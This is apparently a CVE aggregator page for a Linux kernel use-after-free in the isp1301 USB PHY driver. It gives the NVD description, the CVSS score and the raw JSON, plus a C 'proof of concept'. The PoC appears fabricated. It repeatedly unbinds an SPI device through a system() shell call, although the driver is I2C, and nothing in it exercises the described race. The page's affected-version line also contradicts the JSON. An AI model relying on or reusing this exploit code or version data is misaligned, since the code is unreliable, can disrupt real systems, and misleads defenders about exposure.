Security Vulnerability Report
CVE-2025-71145 CVSS 7.8 HIGH

CVE-2025-71145

Published: 2026-01-23 14:16:13
Last Modified: 2026-02-26 20:25:27
Source: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

Description

In the Linux kernel, the following vulnerability has been resolved:

usb: phy: isp1301: fix non-OF device reference imbalance

A recent change fixing a device reference leak in a UDC driver introduced a potential use-after-free in the non-OF case as the isp1301_get_client() helper only increases the reference count for the returned I2C device in the OF case.

Increment the reference count also for non-OF so that the caller can decrement it unconditionally.

Note that this is inherently racy just as using the returned I2C device is since nothing is preventing the PHY driver from being unbound while in use.
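An added illustration, not code from the kernel or from this page: a user-space C model of the reference imbalance described above, showing why an unconditional put is only safe once the non-OF path also takes a reference. All names (`model_dev`, `model_get_client`, `released_while_registered`) are hypothetical, and the single baseline reference is an assumption of the model.

```c
#include <stdbool.h>

/* User-space model of a refcounted device; every name here is hypothetical. */
struct model_dev {
    int refs;       /* outstanding references */
    bool released;  /* set when the count hits zero (memory would be freed) */
};

static void model_get(struct model_dev *d) { d->refs++; }

static void model_put(struct model_dev *d)
{
    if (--d->refs == 0)
        d->released = true;
}

/* Models the lookup helper: the OF path always returns a counted reference;
 * the non-OF path returns a stored pointer, counted only when 'fixed'. */
static struct model_dev *model_get_client(struct model_dev *d, bool of_case,
                                          bool fixed)
{
    if (of_case || fixed)
        model_get(d);
    return d;
}

/* Models the caller after the leak fix: it drops its reference
 * unconditionally. Returns true if that put released the device even
 * though the baseline reference (assumed: device still registered)
 * was never meant to be dropped. */
bool released_while_registered(bool of_case, bool fixed)
{
    struct model_dev dev = { .refs = 1, .released = false }; /* baseline */
    struct model_dev *client = model_get_client(&dev, of_case, fixed);

    model_put(client);    /* caller's unconditional put */
    return dev.released;  /* true => later users hold a dangling pointer */
}

int main(void)
{
    /* Exit status 0 only if the model matches the description. */
    return !(released_while_registered(false, false) &&
             !released_while_registered(false, true) &&
             !released_while_registered(true, false));
}
```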

CVSS Details

CVSS Score: 7.8
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE
Linux kernel < 6.12 (includes fix commits 03bbdaa4da8c, 43e58abad6c0, 5d3df03f7054, 7501ecfe3e52, 75c5d9bce072)
Specifically affects the non-OF path of the isp1301 USB PHY driver

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
c
#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#include <unistd.h>
#include <sys/ioctl.h>
#include <errno.h>

/*
 * CVE-2025-71145 PoC - Linux kernel isp1301 USB PHY driver use-after-free
 * This PoC demonstrates the reference count imbalance in non-OF path
 * Compile: gcc -o cve_2025_71145_poc cve_2025_71145_poc.c
 */

#define ISP1301_MODULE_PATH "/sys/bus/spi/drivers/isp1301_udc"

int trigger_driver_unbind()
{
    int fd;
    char buf[256];

    /* Attempt to trigger driver unbind sequence */
    fd = open(ISP1301_MODULE_PATH, O_RDONLY);
    if (fd < 0) {
        /* Try alternative method via sysfs */
        snprintf(buf, sizeof(buf),
                 "echo %s > /sys/bus/spi/drivers/unbind 2>/dev/null",
                 "spi0.0");
        system(buf);
    } else {
        close(fd);
    }
    return 0;
}

int main(int argc, char *argv[])
{
    int iterations = 1000;
    int i;

    printf("[*] CVE-2025-71145 PoC - isp1301 reference count imbalance\n");
    printf("[*] Target: Linux kernel isp1301 USB PHY driver\n");
    printf("[*] Vulnerability: Use-after-free due to missing get_device() call\n");

    if (geteuid() != 0) {
        printf("[!] Warning: This PoC requires root privileges\n");
        printf("[!] Continuing anyway for demonstration purposes...\n");
    }

    /*
     * Race condition trigger:
     * In non-OF path, isp1301_get_client() doesn't increment device refcount
     * When driver unbinds, put_device() may free device while still in use
     */
    for (i = 0; i < iterations; i++) {
        trigger_driver_unbind();
        usleep(1000); /* Small delay to increase race window */
        if (i % 100 == 0) {
            printf("[*] Iteration %d/%d\n", i, iterations);
        }
    }

    printf("[*] PoC execution completed\n");
    printf("[!] Check dmesg for kernel oops or BUG messages\n");
    return 0;
}

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-71145", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2026-01-23T14:16:12.873", "lastModified": "2026-02-26T20:25:27.440", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nusb: phy: isp1301: fix non-OF device reference imbalance\n\nA recent change fixing a device reference leak in a UDC driver\nintroduced a potential use-after-free in the non-OF case as the\nisp1301_get_client() helper only increases the reference count for the\nreturned I2C device in the OF case.\n\nIncrement the reference count also for non-OF so that the caller can\ndecrement it unconditionally.\n\nNote that this is inherently racy just as using the returned I2C device\nis since nothing is preventing the PHY driver from being unbound while\nin use."}, {"lang": "es", "value": "En el kernel de Linux, la siguiente vulnerabilidad ha sido resuelta:\n\nusb: phy: isp1301: corregir desequilibrio de referencia de dispositivo no-OF\n\nUn cambio reciente que corregía una fuga de referencia de dispositivo en un controlador UDC introdujo un potencial uso después de liberación en el caso no-OF, ya que la función auxiliar isp1301_get_client() solo incrementa el contador de referencias para el dispositivo I2C devuelto en el caso OF.\n\nIncrementar el contador de referencias también para no-OF para que el llamador pueda decrementarlo incondicionalmente.\n\nTenga en cuenta que esto es inherentemente propenso a condiciones de carrera, al igual que lo es usar el dispositivo I2C devuelto, ya que nada impide que el controlador PHY sea desvinculado mientras está en uso."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": 
"LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-Other"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.10.248", "versionEndExcluding": "5.11", "matchCriteriaId": "27953D46-F1BA-44DF-8344-E000813BC82B"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/03bbdaa4da8c6ea0c8431a5011db188a07822c8a", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/43e58abad6c08c5f0943594126ef4cd6559aac0b", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/5d3df03f70547d4e3fc10ed4381c052eff51b157", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/7501ecfe3e5202490c2d13dc7e181203601fcd69", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/75c5d9bce072abbbc09b701a49869ac23c34a906", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/b4b64fda4d30a83a7f00e92a0c8a1d47699609f3", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}